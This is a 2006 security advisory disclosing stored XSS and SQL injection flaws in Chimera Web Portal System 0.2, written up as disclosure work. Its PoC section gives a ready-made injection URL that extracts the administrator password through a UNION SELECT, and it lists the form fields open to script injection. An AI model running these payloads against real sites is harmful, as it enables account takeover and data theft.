Multiple Vulnerabilities in Chimera Web Portal System
Summary
- Vulnerability
- Multiple Vulnerabilities in Chimera Web Portal System
- Discovered
- 2006.01.01
- Last Update
- 0 n/a
- ID
- EV0007
- CVE
- CVE-2006-0136 CVE-2006-0137
- Risk Level
- medium
- Type
- Multiple Vulnerabilities
- Status
- Unpatched
- Vendor
- Phanatic Softwares (http://www.psoftwares.f2s.com/)
- Vulnerable Software
- Chimera Web Portal System (http://sourceforge.net/projects/chimera/)
- Version
- 0.2
- PoC/Exploit
- Available
- Solution
- Not available
- Discovered by
- Aliaksandr Hartsuyeu (eVuln.com)
Description
Multiple Vulnerabilities found in Chimera Web Portal System (http://sourceforge.net/projects/chimera/) script.
XSS
Vulnerable script: modules.php
Variables comment_poster comment_poster_email comment_poster_homepage comment_text isn't sanitized. Users can post messages with any script code.
SQL Injection
Vulnerable script: linkcategory.php
Variable $id isn't properly sanitized before being used in a SQL query. This can be used to make any SQL query by injecting arbitrary SQL code.
Condition: magic_quotes_gpc = off
PoC/Exploit
XSS
Guestbook:
http://host/chimera/modules.php?name=guestbook&file=index
comment_poster=<XSS>
comment_poster_email=<XSS>
comment_poster_homepage=<XSS>
comment_text=<XSS>
SQL Injection
Admin password:
http://host/chimera/linkcategory.php? id=9999'%20union%20select%20admin_password%20from%20admin/*
Solution.
Solution for "Multiple Vulnerabilities in Chimera Web Portal System" is not available. Check Phanatic Softwares website for updates.